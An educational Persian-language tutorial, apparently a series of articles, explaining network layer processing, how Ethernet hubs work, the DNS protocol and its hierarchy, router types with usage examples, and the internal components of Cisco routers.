• در لايه Network ، آدرس IP موجود در بسته اطلاعاتی با آدرس IP کامپيوتر دريافت کننده مقايسه شده و در صورت مطابقت ، هدر لايه Network و يا هدر IP از بسته اطلاعاتی برداشته شده و مابقی بسته اطلاعاتی برای لايه بالاتر ( لايه Transport ) ، ارسال می گردد . به داده موجود در اين لايه ، سگمنت گفته می شود .
• سگمنت در لايه Transport پردازش و عمليات بازسازی مجدد داده دريافتی ، انجام خواهد شد . در زمان بازسازی مجدد داده دريافتی توسط کامپيوتر گيرنده به فرستنده اطلاع داده می شود که وی هر يک از بخش ها را دريافت نموده است تا خللی در بازسازی مجدد داده ايجاد نگردد . با توجه به ارسال يک ACK برای فرستنده ( اعلام وضعيت سگمنت دريافتی به کامپيوتر فرستنده ) ، از پروتکل TCP در مقابل UDP استفاده شده است . پس از انجام عمليات فوق ، داده دريافتی در اختيار لايه Application گذاشته می شود .

در زمان مبادله اطلاعات بين کامپيوترهای موجود در شبکه ، کاربران درگير جزئيات مسئله نشده و تمامی فرآيندهای اشاره شده به صورت اتوماتيک انجام خواهد شد .

هاب از جمله تجهيزات سخت افزاری است که از آن به منظور برپاسازی شبکه های کامپيوتری استفاده می شود . گرچه در اکثر شبکه هائی که امروزه ايجاد می گردد از سوئيچ  در مقابل هاب  استفاده می گردد، ولی ما همچنان شاهد استفاده از اين نوع تجهيزات سخت افزاری در شبکه های متعددی می باشيم . در اين مطلب قصد داريم به بررسی هاب و نحوه عملکرد آن اشاره نمائيم . قبل از پرداختن به اصل موضوع لازم است در ابتدا با برخی تعاريف مهم که در ادامه بدفعات به آنان مراجعه خواهيم کرد ، بيشتر آشنا شويم .

• Domain : تمامی کامپيوترهای عضوء يک domain هر اتفاق و يا رويدادی را که در domain اتفاق می افتد ، مشاهده و يا خواهند شنيد .
• Collision Domain : در صورت بروز يک تصادم ( Collision ) بين دو کامپيوتر، ساير کامپيوترهای موجود در domain آن را شنيده و آگاهی لازم در خصوص آن چيزی که اتفاق افتاده است را پيدا خواهند کرد . کامپيوترهای فوق عضوء يک Collision Domain يکسان می باشند. تمامی کامپيوترهائی که با استفاده از هاب به يکديگر متصل می شوند ، عضوء يک Collision Domain يکسان خواهند بود ( بر خلاف سوئيچ ) .
• Broadcast Domain : در اين نوع domain ، يک پيام broadcast ( يک فريم و يا داده که برای تمامی کامپيوترها ارسال می گردد) برای هر يک از کامپيوترهای موجود در doamin ارسال می گردد . هاب و سوئيچ با موضوع broadcast domain برخورد مناسبی نداشته ( ايجاد حوزه های مجزاء ) و در اين رابطه به يک روتر نياز خواهد بود .

به منظور برخورد مناسب ( ايجاد حوزه های مجزاء )  با  collision domain ، broadcast domain  و افزايش سرعت و کارائی يک شبکه از تجهيزات سخت افزاری متعددی استفاده می شود . سوئيچ ها collision domain مجزائی را ايجاد می نمايند ولی در خصوص broadcast doamin بدين شکل رفتار نمی نمايند . روترها ، broadcast domain و collision domain مجزائی را ايجاد نموده و در مقابل هاب ، قادر به ايجاد broadcast doamin و Collision domain جداگانه نمی باشد . شکل زير يک نمونه هاب هشت پورت را نشان می دهد ( D-Link DE-808TP 10Mbps Ethernet 8-Port Mini-Hub ) .

منبع : سايت D-Link

آشنائی با نحوه عملکرد هاب
هاب ، يکی از تجهيزات متداول در شبکه های کامپيوتری  و  ارزانترين روش اتصال دو  و يا چندين کامپيوتر به يکديگر است . هاب در اولين لايه مدل مرجع OSI فعاليت می نمايد . آنان فريم های داده را نمی خوانند ( کاری که سوئيچ و يا روتر انجام می دهند ) و صرفا"  اين اطمينان را ايجاد می نمايند که  فريم های داده بر روی هر يک از پورت ها ، تکرار خواهد شد.
گره هائی که يک  اترنت و يا Fast Ethernet را  با استفاده از قوانين CSMA/CD به اشتراک می گذارند ، عضوء يک  Collision Domain مشابه می باشند . اين بدان معنی است که تمامی گره های متصل شده به هاب بخشی از Collision domain مشابه بوده و  زمانی که يک collision اتفاق می افتد ، ساير گره های موجود در domain نيز آن را شنيده و از آن متاثر خواهند شد .
کامپيوترها و يا گره های متصل شده به هاب از کابل های ( UTP (Unshielded Twisted Pair  ، استفاده می نمايند. صرفا" يک گره می تواند به هر پورت هاب متصل گردد. مثلا" با استفاده از يک هاب  هشت پورت ، امکان اتصال هشت کامپيوتر وجود خواهد داشت .زمانی که هاب ها به متداولی امروز نبودند و قيمت آنان نيز گران بود ، در اکثر شبکه های نصب شده در ادارات و يا منازل از کابل های کواکسيال، استفاده می گرديد.
نحوه کار هاب بسيار ساده است . زمانی که يکی از کامپيوترهای متصل شده به هاب اقدام به ارسال داده ئی می نمايد ، ساير پورت های هاب نيز آن را دريافت خواهند کرد ( داده ارسالی تکرار و برای ساير پورت های هاب نيز فرستاده می شود  ) . شکل زير نحوه عملکرد هاب را نشان می دهد .

همانگونه که در شکل فوق مشاهده می نمائيد ،  گره يک داده ئی را برای گره شش ارسال می نمايد ولی تمامی گره های ديگر نيز داده را دريافت خواهند کرد . در ادامه ، بررسی لازم در خصوص داده ارسالی توسط هر يک از گره ها انجام و در صورتی که تشخيص داده شود که داده ارسالی متعلق به آنان نيست ، آن را ناديده خواهند گرفت . عمليات فوق از طريق کارت شبکه موجود بر روی کامپيوتر که آدرس MAC مقصد فريم ارسالی را بررسی می نمايد ، انجام می شود .کارت شبکه بررسی لازم را انجام  و در صورت عدم مطابقت آدرس MAC موجود در فريم ، با آدرس MAC کارت شبکه ، فريم ارسالی دور انداخته می گردد .
اکثر هاب ها  دارای يک پورت خاص می باشند که می تواند به صورت يک پورت معمولی و يا يک پورت uplink رفتار نمايد . با استفاده از يک پورت uplink می توان يک هاب ديگر را به هاب موجود، متصل نمود. بدين ترتيب تعداد پورت ها افزايش يافته و امکان اتصال تعداد بيشتری کامپيوتر به شبکه فراهم می گردد .روش فوق گزينه ای ارزان قيمت به منظور افزايش تعداد گره ها در يک شبکه است ولی با انجام اين کار شبکه شلوغ تر شده و همواره بر روی آن حجم بالائی داده غير ضروری در حال جابجائی است. تمامی گره ها ، عضوء يک Broadcast domain و collision domain يکسانی می باشند ، بنابراين تمامی آنان هر نوع collision و يا Broadcast را که اتفاق خواهد افتاد ، می شنوند .
در اکثر  هاب ها از يک LED به منظور نشان دادن فعال بودن ارتباط برقرار شده بين هاب و  گره و از LED ديگر به منظور نشان دادن بروز يک collision ، استفاده می گردد . ( دو LED مجزاء ) . در برخی از هاب ها  دو LED مربوط به فعال بودن لينک ارتباطی بين هاب و گره و  فعاليت پورت با يکديگر ترکيب و زمانی که پورت در حال فعاليت است ، LED مربوطه چشمک زن شده و زمانی که فعاليتی انجام نمی شود، LED فوق به صورت پيوسته روشن خواهد بود .

LED  مربوط به Collision موجود بر روی هاب ها زمانی روشن می گردد که يک collision بوجود آيد . Collision زمانی بوجود می آيد که  دو کامپيوتر و يا گره سعی نمايند در يک لحظه بر روی شبکه صحبت نمايند . پس از بروز يک Collision ، فريم های مربوط به هر يک از گره ها با يکديگر برخورد نموده و خراب می گردند . هاب به منظور تشخيص اين نوع تصادم ها به اندازه کافی هوشمند بوده و برای مدت زمان کوتاهی چراغ مربوط به collision روشن می گردد . ( يک دهم ثانيه به ازای هر تصادم ) .
تعداد اندکی از هاب ها دارای يک اتصال خاص از نوع BNC بوده که می توان از آن به منظور اتصال يک کابل کواکسيال ، استفاده نمود . پس از اتصال فوق ، LED مربوط به اتصال BNC روی هاب روشن می گردد.

DNS از کلمات Domain Name System اقتباس و  يک پروتکل شناخته شده در عرصه شبکه های کامپيوتری خصوصا" اينترنت است . از پروتکل فوق به منظور ترجمه  اسامی کامپيوترهای ميزبان و Domain به آدرس های IP استفاده می گردد. زمانی که شما آدرس www.srco.ir را در مرورگر خود تايپ می نمائيد ، نام فوق به يک آدرس IP و بر اساس يک درخواست خاص ( query )  که از جانب کامپيوتر شما صادر می شود ، ترجمه می گردد . 
تاريخچه DNS
DNS ، زمانی که اينترنت تا به اين اندازه گسترش پيدا نکرده بود و صرفا" در حد و اندازه يک شبکه کوچک بود ، استفاده می گرديد . در آن زمان ، اسامی کامپيوترهای ميزبان به صورت دستی در فايلی با نام HOSTS درج می گرديد . فايل فوق بر روی يک سرويس دهنده مرکزی قرار می گرفت . هر سايت و يا کامپيوتر که نيازمند ترجمه اسامی کامپيوترهای ميزبان بود ، می بايست از فايل فوق استفاده می نمود . همزمان با گسترش اينترنت و افزايش تعداد کامپيوترهای ميزبان ، حجم فايل فوق نيز افزايش و  امکان استفاده از آن با مشکل مواجه گرديد ( افزايش ترافيک شبکه ). با توجه به مسائل فوق ، در سال 1984 تکنولوژی DNS معرفی گرديد .

پروتکل DNS
DNS  ، يک "بانک اطلاعاتی توزيع شده " است  که بر روی ماشين های متعددی مستقر می شود ( مشابه ريشه های يک درخت که از ريشه اصلی انشعاب می شوند ) . امروزه اکثر شرکت ها و موسسات دارای يک سرويس دهنده DNS کوچک در سازمان خود می باشند تا اين اطمينان ايجاد گردد که کامپيوترها بدون بروز هيچگونه مشکلی ، يکديگر را پيدا می نمايند . در صورتی که از ويندوز 2000 و اکتيو دايرکتوری استفاده می نمائيد، قطعا" از DNS به منظور  ترجمه اسامی کامپيوترها به آدرس های IP ، استفاده می شود . شرکت مايکروسافت در ابتدا نسخه اختصاصی سرويس دهنده DNS  خود را با نام ( WINS ( Windows Internet Name Service  طراحی و پياده سازی نمود . سرويس دهنده فوق مبتنی بر تکنولوژی های قديمی بود و از پروتکل هائی استفاده می گرديد که هرگز دارای کارائی مشابه DNS نبودند .  بنابراين طبيعی بود که شرکت مايکروسافت از WINS فاصله گرفته و به سمت DNS حرکت کند . 
از پروتکل DNS  در مواردی که کامپيوتر شما اقدام به ارسال يک درخواست مبتنی بر DNS برای يک سرويس دهنده نام به منظور يافتن آدرس Domain  می نمايد ، استفاده می شود .مثلا" در صورتی که در مرورگر خود آدرس www.srco.ir  را تايپ نمائيد ،  يک درخواست مبتنی بر DNS از کامپيوتر شما و به مقصد يک سرويس دهنده DNS صادر می شود . ماموريت درخواست ارسالی ، يافتن آدرس IP وب سايت سخاروش است .

پروتکل DNS و مدل مرجع OSI
پروتکل DNS معمولا" از پروتکل UDP به منظور حمل داده استفاده می نمايد . پروتکل UDP نسبت به TCP دارای overhead کمتری می باشد. هر اندازه overhead يک پروتکل کمتر باشد ، سرعت آن بيشتر خواهد بود . در مواردی که حمل  داده با استفاده از پروتکل UDP با مشکل و يا بهتر بگوئيم خطاء مواجه گردد ، پروتکل DNS از پروتکل TCP به منظور حمل داده استفاده نموده تا اين اطمينان ايجاد گردد که داده بدرستی و بدون بروز خطاء به مقصد خواهد رسيد .

فرآيند ارسال يک درخواست DNS و دريافت پاسخ آن ، متناسب با نوع سيستم عامل نصب شده بر روی يک کامپيوتر است .برخی از سيستم های عامل اجازه  استفاده از پروتکل TCP برای DNS را نداده و صرفا"  می بايست از پروتکل UDP  به منظور حمل داده استفاده شود . بديهی است در چنين مواردی همواره اين احتمال وجود خواهد داشت که با خطاهائی مواجه شده و عملا" امکان ترجمه نام يک کامپيوتر و يا Domain به آدرس IP وجود نداشته باشد .
پروتکل DNS از پورت 53 به منظور ارائه خدمات خود استفاده می نمايد . بنابراين  يک سرويس دهنده DNS به پورت 53 گوش داده و اين انتظار را خواهد داشت که هر سرويس گيرنده ای که تمايل به استفاده از سرويس فوق را دارد از پورت مشابه استفاده نمايد . در برخی موارد ممکن است مجبور شويم از پورت ديگری استفاده نمائيم . وضعيت فوق به سيستم عامل و سرويس دهنده DNS نصب شده بر روی يک کامپيوتر بستگی دارد.

ساختار سرويس دهندگان نام دامنه ها در اينترنت
امروزه بر روی اينترنت ميليون ها سايت با اسامی Domain ثبت شده  وجود دارد . شايد اين سوال برای شما تاکنون مطرح شده باشد که اين اسامی چگونه سازماندهی می شوند ؟ ساختار DNS بگونه ای طراحی شده است که يک سرويس دهنده DNS ضرورتی به آگاهی از تمامی اسامی Domain ريجستر شده نداشته و صرفا" ميزان آگاهی وی به يک سطح بالاتر و يک سطح پائين تر  از خود محدود می گردد . شکل زير بخش های متفاوت ساختار سلسله مراتبی DNS را نشان می دهد :

internic ، مسئوليت کنترل دامنه های ريشه را برعهده داشته که شامل تمامی Domain های سطح بالا می باشد ( در شکل فوق به رنگ  آبی نشان داده شده است) . در بخش فوق تمامی سرويس دهندگان DNS  ريشه قرار داشته و آنان دارای آگاهی لازم در خصوص دامنه های موجود  در سطح پائين تر از خود می باشند ( مثلا" microsoft.com ) . سرويس دهندگان DNS ريشه مشخص خواهند کرد که کدام سرويس دهنده DNS در ارتباط با دامنه های microsoft.com و يا Cisco.com می باشد .
هر domain شامل يک Primary DNS  و يک  Secondary DNS می باشد . Primary DNS ، تمامی اطلاعات مرتبط با Domain خود را نگهداری می نمايد. Secondary DNS به منزله يک backup بوده و در مواردی که Primary DNS با مشکل مواجه می شود از آن استفاده می گردد . به فرآيندی که بر اساس آن يک سرويس دهنده Primary DNS اطلاعات خود را در سرويس دهنده Secondary DNS تکثير می نمايد ، Zone Transfer  گفته می شود .
امروزه صدها وب سايت وجود دارد که می توان با استفاده از آنان يک Domain  را ثبت و يا اصطلاحا" ريجستر نمود . پس از ثبت يک Domain ، امکان مديريت آن در اختيار شما گذاشته شده و می توان رکوردهای منبع (RR ) را در آن تعريف نمود.  Support, www و Routers  ، نمونه هائی از رکوردهای منبع در ارتباط با دامنه Cisco.com می باشد. به منظور ايجاد Subdomain می توان از يک برنامه مديريتی DNS استفاده نمود .  www و يا هر نوع رکورد منبع ديگری را  می توان با استفاده از اينترفيس فوق تعريف نمود . پس از اعمال تغييرات دلخواه خود در ارتباط با Domain ، محتويات فايل های خاصی که بر روی سرويس دهنده ذخيره شده اند  نيز تغيير نموده و در ادامه تغييرات فوق به ساير سرويس دهندگان تائيد شده اطلاع داده می شود . سرويس دهندگان فوق ، مسئوليت Domain شما را برعهده داشته و در ادامه تمامی اينترنت که به اين سرويس دهندگان DNS متصل می شوند از تغييرات ايجاد شده آگاه و قادر به برقراری ارتباط با هر يک از بخش های Domain  می گردند.
مثلا" در صورتی که قصد ارتباط با  Support.Cisco.com را داشته باشيد، کامپيوتر شما با سرويس دهنده DNS که مسئوليت مديريت دامنه های Com. را دارد ، ارتباط برقرار نموده و سرويس دهنده فوق اطلاعات لازم در خصوص دامنه Cisco.com را در اختيار قرار خواهد داد . در نهايت سرويس دهنده DNS مربوط به Cisco.com  ( سرويس دهنده فوق ، تمامی اطلاعات مرتبط با دامنه Cisco.com را در خود نگهداری می نمايد ) ، آدرس IP کامپيوتر مربوط به Support.Cisco.com را مشخص نموده تا امکان برقراری ارتباط با آن فراهم گردد .

استفاده از روترها در شبکه به امری متداول تبديل شده است . يکی از دلايل مهم گسترش استفاده از روتر ، ضرورت اتصال يک شبکه به چندين شبکه ديگر ( اينترنت و يا ساير سايت ها ی از راه دور ) در عصر حاضر است . نام در نظر گرفته شده برای روترها ، متناسب با کاری است که آنان انجام می دهند : " ارسال داده از يک شبکه به شبکه ای ديگر " . مثلا" در صورتی که يک شرکت دارای شعبه ای در تهران و  يک دفتر ديگر در اهواز باشد ، به منظور اتصال آنان به يکديگر می توان از يک خط  leased ( اختصاصی ) که به هر يک از روترهای موجود در دفاتر متصل می گردد ، استفاده نمود . بدين ترتيب ، هر گونه ترافيکی که لازم است از يک سايت به سايت ديگر انجام شود از طريق روتر محقق شده و تمامی ترافيک های غيرضروری ديگر فيلتر و در پهنای باند و هزينه های مربوطه ، صرفه جوئی می گردد .

انواع روترها
روترها را می توان به دو گروه عمده سخت افزاری و نرم افزاری تقسيم نمود:

• روترهای سخت افزاری : روترهای فوق ، سخت افزارهائی می باشند که نرم افزارهای خاص توليد شده توسط توليد کنندگان را اجراء می نمايند (در حال حاضر صرفا" به صورت black box به آنان نگاه می کنيم ).نرم افزار فوق ، قابليت روتينگ را برای روترها فراهم نموده تا آنان مهمترين و شايد ساده ترين وظيفه خود که ارسال داده از يک شبکه به شبکه ديگر است را بخوبی انجام دهند . اکثر شرکت ها ترجيح می دهند که از روترهای سخت افزاری استفاده نمايند چراکه آنان در مقايسه با روترهای نرم افزاری، دارای سرعت و اعتماد پذيری بيشتری می باشند . شکل زير يک نمونه روتر را نشان می دهد . ( Cisco 2600 Series Multiservice Platform )

• روترهای نرم افزاری : روترهای نرم افزاری دارای عملکردی مشابه با روترهای سخت افزاری بوده و مسئوليت اصلی آنان نيز ارسال داده از يک شبکه به شبکه ديگر است. يک روتر نرم افزاری می تواند يک سرويس دهنده NT ، يک سرويس دهنده نت ور و يا يک سرويس دهنده لينوکس باشد . تمامی سيستم های عامل شبکه ای مطرح ،دارای قابليت های روتينگ از قبل تعبيه شده می باشند .

در اکثر موارد از روترها به عنوان فايروال و يا gateway  اينترنت ، استفاده می گردد . در اين رابطه لازم است به يکی از مهمترين تفاوت های موجود بين روترهای نرم افزاری و سخت افزاری ، اشاره گردد : در اکثر موارد نمی توان يک روتر نرم افزاری را جايگزين يک روتر سخت افزاری نمود ، چراکه روترهای سخت افزاری دارای سخت افزار لازم و از قبل تعبيه شده ای می باشند که به آنان امکان اتصال به يک لينک خاص WAN ( از نوع Frame Relay ، ISDN و يا ATM ) را خواهد داد .يک روتر نرم افزاری ( نظير سرويس دهنده ويندوز ) دارای تعدادی کارت شبکه است که هر يک از آنان به يک شبکه LAN متصل شده و ساير اتصالات به شبکه های WAN از طريق روترهای سخت افزاری ، انجام خواهد شد .
مثال 1 :  استفاده از روتر به منظور اتصال دو شبکه به يکديگر و ارتباط به اينترنت
فرض کنيد از يک روتر مطابق شکل زير به منظور اتصال دو شبکه LAN به يکديگر و اينترنت ، استفاده شده است . زمانی که روتر داده ای را از طريق يک شبکه LAN و يا اينترنت دريافت می نمايد ، پس از بررسی آدرس مبداء و مقصد ، داده دريافتی را برای هر يک از شبکه ها و يا اينترنت ارسال می نمايد . روتر استفاده شده در شکل زير ، شبکه را به دو بخش متفاوت تقسيم نموده است .( دو شبکه مجزاء ) . هر شبکه دارای يک هاب است که تمامی کامپيوترهای موجود در شبکه به آن متصل شده اند . علاوه بر موارد فوق ، روتر استفاده شده دارای اينترفيس های لازم به منظور اتصال هر شبکه به آن بوده و از يک اينترفيس ديگر به منظور اتصال به اينترنت ، استفاده می نمايد . بدين ترتيب ،  روتر قادر است داده مورد نظر را به مقصد درست ، ارسال نمايد .

مثال 2:  استفاده از روتر در يک شبکه LAN
فرض کنيد از يک روتر مطابق شکل زير در يک شبکه LAN ، استفاده شده است . در مدل فوق ، هر يک از دستگاههای  موجود در شبکه با روتر موجود نظير يک gateway برخورد می نمايند . بدين ترتيب ، هر يک از ماشين های موجود بر روی شبکه LAN که قصد ارسال يک بسته اطلاعاتی ( اينترنت و يا هر محل خارج از شبکه LAN ) را داشته باشند ، بسته اطلاعاتی مورد نظر را برای gateway ارسال می نمايند . روتر ( gateway ) نسبت به محل ارسال داده دارای آگاهی لازم می باشد . ( در زمان تنظيم خصلت های پروتکل TCP/IP برای هر يک از ماشين های موجود در شبکه يک آدرس IP برای gateway در نظر گرفته می شود ) .  شکل زير نحوه استفاده از يک روتر به منظور دستيابی کاربران به اينترنت در شبکه LAN را نشان می دهد :

مثال 3:  استفاده از روتر به منظور اتصال دو دفتر کار
فرض کنيد ، بخواهيم از روتر به منظور اتصال دو دفتر کار يک سازمان به يکديگر ، استفاده نمائيم . بدين منظور هر يک از روترهای موجود در شبکه با استفاده از يک پروتکل WAN نظير ISDN به يکديگر متصل می گردند . عملا" ، با استفاده از يک کابل که توسط ISP مربوطه ارائه می گردد ، امکان اتصال به اينترفيس WAN روتر فراهم شده و از آنجا سيگنال مستقيما" به شبکه ISP مربوطه رفته و سر ديگر آن به اينترفيس WAN روتر ديگر متصل می گردد . روترها ، قادر به حمايت از پروتکل های WAN متعددی نظير  Frame Relay , ATM , HDLC و يا PPP ، می باشند .

مهمترين ويژگی های يک روتر :

• روترها دستگاههای لايه سوم ( مدل مرجع OSI ) می باشند .
• روترها ماداميکه برنامه ريزی نگردند ، امکان توزيع داده را نخواهند داشت .
• اکثر روترهای مهم  دارای سيستم عامل اختصاصی خاص خود می باشند .
• روترها از پروتکل های خاصی به منظور مبادله اطلاعات ضروری خود ( منظور داده نيست ) ، استفاده می نمايند .
• نحوه عملکرد يک روتر در اينترنت  : مسير ايجاد شده برای انجام مبادله اطلاعاتی بين سرويس گيرنده و سرويس دهنده در تمامی مدت زمان انجام تراکش ثابت و يکسان نبوده و متناسب با وضعيت ترافيک موجود و در دسترس بودن مسير ، تغيير می نمايد .

آشنائی با روترهای سيسکو
سيسکو يکی از معتبرترين توليد کنندگان روتر و سوئيچ در سطح جهان است که از محصولات آن در مراکر شبکه ای متعددی استفاده می گردد . اين شرکت تاکنون مدل های متعددی از روترها را با قابليت های مختلفی توليد نموده است . سری 1600 ، 2500 و 2600 ، متداولترين نمونه در اين زمينه می باشند . روترهای توليد شده توسط اين شرکت از سری 600 شروع و تا سری 12000 ادامه می يابد( در حال حاضر ) . شکل زير برخی از نمونه های موجود را نشان می دهد :

تمامی تجهيزات فوق ، نرم افزار خاصی را با نام Internetwork Operating System و يا IOS اجراء می نمايند . IOS ، هسته روترها و اکثر سوئيچ های توليد شده توسط سيسکو ، محسوب می گردد . اين شرکت با رعايت اصل مهم سازگاری که از آن به عنوان يک استراتژی مهم در توليد و با نام Cisco Fusion ، نام برده می شود ، قصد دارد محصولات خود را بگونه ای توليد نمايد که تمامی دستگاههای سيسکو يک سيستم عامل يکسان را اجراء نمايند .

عناصر اصلی در يک روتر سيسکو

• اينترفيس ( Interfaces ) .با استفاده از اينترفيس ها ، امکان استفاده از روتر فراهم می گردد . اينترفيس ها شامل پورت های سريال و اترنت مختلفی می باشند که از آنان به منظور اتصال روتر به شبکه LAN استفاده می گردد .هر روتر با توجه به پتانسيل های ارائه شده ، دارای اينترفيس های متعددی است . برای هر يک از اينترفيس های روتر از يک نام خاص استفاده می شود . جدول زير برخی از اسامی متداول را نشان می دهد .

• در شکل زير نمای پشت يک روتر سيسکو را به همراه اينترفيس های متفاوت آن مشاهده می نمائيد . ( يک روتر با قابليت استفاده از ISDN ) .
• منبع : سايت سيسکو
• همانگونه که مشاهده می نمائيد ، روتر فوق حتی دارای سوکت های مختص تلفن نيز می باشد ، چراکه با توجه به اين که روتر فوق از نوع ISDN می باشد ، می بايست يک تلفن ديجيتالی را به يک خط ISDN متصل نمود. روتر فوق علاوه بر اينترفيس های ISDN دارای يک اينترفيس اترنت به منظور اتصال به يک دستگاه در شبکه LAN است ( معمولا" يک هاب و يا يک کامپيوتر ) . در صورتی که اينترفيس فوق را به پورت uplink يک هاب متصل نمائيد ، می بايست سوئيچ کوچک موجود در پشت روتر را در حالت هاب ، تنظيم نمود . در صورتی که اينترفيس فوق را به يک دستگاه کامپيوتر متصل نمائيد ، می بايست وضعيت سوئيچ را در حالت node قرار داد . پورت Config و يا Console از نوع کانکتور DB9 ( مادگی ) بوده که با استفاده از يک کابل خاص به پورت سريال کامپيوتر متصل تا امکان پيکربندی مستقيم روتر ، فراهم می گردد .
• پردازنده ( CPU ) : تمامی روترهای سيسکو دارای يک پردازنده اصلی می باشند که مسئوليت انجام عمليات اصلی در روتر را برعهده دارند . پردازنده با توليد وققه ( IRQ ) با ساير عناصر موجود در روتر ارتباط برقرار می نمايد . روترهای سيسکو از پردازنده های RISC موتورولا استفاده می نمايند. معمولا" درصد استفاده از پردازنده بر روی يک روتر معمولی از بيست تجاوز نمی نمايد .
• IOS ، سيستم عامل اصلی اجراء شده بر روی روترها است . IOS بر اساس فرآيند موسوم به Bootup ، لود و در حافظه مستقر می گردد . حجم IOS معمولا" بين دو تا پنچ مگابايت بوده و اين حجم می تواند با توجه به نوع روتر از ميزان اشاره شده نيز تجاوز نمايد . آخرين نسخه IOS در حال حاضر ، نسخه شماره دوازده است . شرکت سيسکو به صورت مستمر و با هدف برطرف نمودن باگ ها و يا افزودن قابليـت های اضافه ، اقدام به ارائه نسخه های جانبی متعددی در طی هر ماه می نمايد . ( 1 . 12 ، 2. 12 ) .
  IOS ، قابليت ها و پتانسيل های متعددی را در رابطه با روتر ارائه داده و می توان آن را بهنگام و يا به منظور Backup گرفتن آن را از روتر download نمود . در سری 16000 به بالا ، IOS بر روی يک حافظه فلش کارت PCMCIA ارائه شده است . حافظه فوق ، در ادامه به يک اسلات موجود در پشت روتر متصل شده و از طريق آن IOS image ، لود می گردد . IOS image ، معمولا" فشرده بوده و روتر می بايست آن را از حالت فشرده خارج نمايد.
  IOS يکی از مهمترين عناصر موجود در يک روتر بوده و بدون وجود آن ، امکان استفاده از روتر وجود نخواهد داشت . به منظور استقرار IOS در حافظه ضرورتی به داشتن يک کارت فلش ( همانگونه که در خصوص روترهای سری 1600 اشاره گرديد ) نخواهد بود . بدين منظور می توان پيکربندی اکثر روترهای سيسکو را به منظور لود IOS image از طريق يک سرويس دهنده tftp شبکه و يا روتر ديگری که دارای چندين IOS image برای روترهای متفاوتی است ، انجام داد . در چنين روترهائی از يک فلش کارت حافظه با ظرفيت بالا به منظور ذخيره سازی چندين ISO image ، استفاده می گردد .
• RXBoot Image ، که به آن Bootloader نيز گفته می شود ، چيزی بيشتر از يک نسخه کم حجم IOS نبوده که در حافظه ROM روتر مستقر می گردد . در صورتی که يک روتر دارای فلش کارت لازم به منظور لود IOS نباشد، می توان پيکربندی روتر را بگونه ای انجام داد که RXBoot image را لود نمايد . با لود برنامه فوق ، امکان انجام عمليات اوليه نگهداری و فعال نمودن و يا غير فعال کردن اينترفيس های متفاوت آن فراهم می گردد .
• حافظه RAM ، محلی است که روتر، IOS و فايل های پيکربندی را در آن لود می نمايد . عملکرد حافظه فوق مشابه حافظه RAM استفاده شده در کامپيوتر است ( استقرار سيستم عامل و برنامه های کاربردی متفاوت ) . ميزان حافظه RAM مورد نياز يک روتر ، بستگی به اندازه IOS image و فايل های پيکربندی دارد . در اکثر موارد و در روترهای کوچک تر ( سری 1600 ) ، حافظه RAM استفاده شده بين دوازده تا شانزده مگابايت می باشد.اين وضعيت در روترهای بزرگتر که دارای ISO image بيشتری می باشند، بين سی و دو تا شصت و چهار مگابايت خواهد بود . با توجه به استقرار جداول روتينگ در حافظه RAM ، در صورتی که جداول فوق بزرگ و پيچيده می باشند ، می بايست از يک روتر با ميزان حافظه RAM مناسبی استفاده گردد .
• حافظه ( NVRAM ( Non-Volatile RAM . روترها از حافظه فوق به منظور ذخيره و نگهداری اطلاعات مربوط به پيکربندی خود استفاده می نمايند . پس از پيکربندی يک روتر ، نتايج و ماحصل عمليات در NVRAM ذخيره می گردد . حجم حافظه فوق در مقايسه با حافظه های RAM ، اندک می باشد. مثلا" در روترهای سری 1600 ، حجم حافظه فوق به هشت کيلوبايت می رسد. در روترهای بزرگتری نظير سری 2600 ، حجم حافظه NVRAM به سی و دو کيلوبايـت می رسد . پس از راه اندازی يک روتر و لود ISO image ، فايل پيکربندی از حافظه NVRAM به منظور انجام پيکربندی روتر ، لود می گردد . اطلاعات موجود در اين نوع از حافظه ها ، پاک نخواهد شد (حتی زمانی که روتر Reload و يا خاموش است ) .
• حافظه ROM ، از حافظه فوق به منظور راه اندازی و نگهداری روتر استفاده می گردد . حافظه فوق شامل برخی کدها نظير Bootstrap و POST بوده که تسهيلات لازم در خصوص انجام تست های اوليه و راه انداری را برای روتر فراهم می نمايد . محتويات اين حافظه را نمی توان تغيير داد ( فقط خواندنی ). تمامی اطلاعات موجود در حافظه ROM توسط توليد کننده ذخيره شده است .
• حافظه فلش ، همان کارتی است که در بخش IOS به آن اشاره گرديد .
  اين حافظه از نوع( EEPROM (Electrical Eraseable Programmable Read Only Memory ، می باشد . کارت فوق از طريق اسلاتی که در پشت يک روتر قرار دارد به روتر متصل می گردد و چيزی بيش از IOS image را در خود ذخيره نمی نمايد . با استفاده از کنسول روتر می توان اطلاعاتی را در اين نوع حافظه نوشت و يا اقدام به حذف برخی اطلاعات موجود نمود . حجم حافظه فوق از 4 مگابايت در روترهای سری 1600 شروع شده و متناسب با مدل روتر ، افزايش می يابد .
• ريجستر پيکربندی ( Configuration Register ) ، نقطه شروع فرآيند راه اندازی IOS را مشخص می نمايد ( فلش کارت ، سرويس دهنده tftp و يا صرفا" لود RXBoot image ). ريجستر فوق، شانزده بيتی است .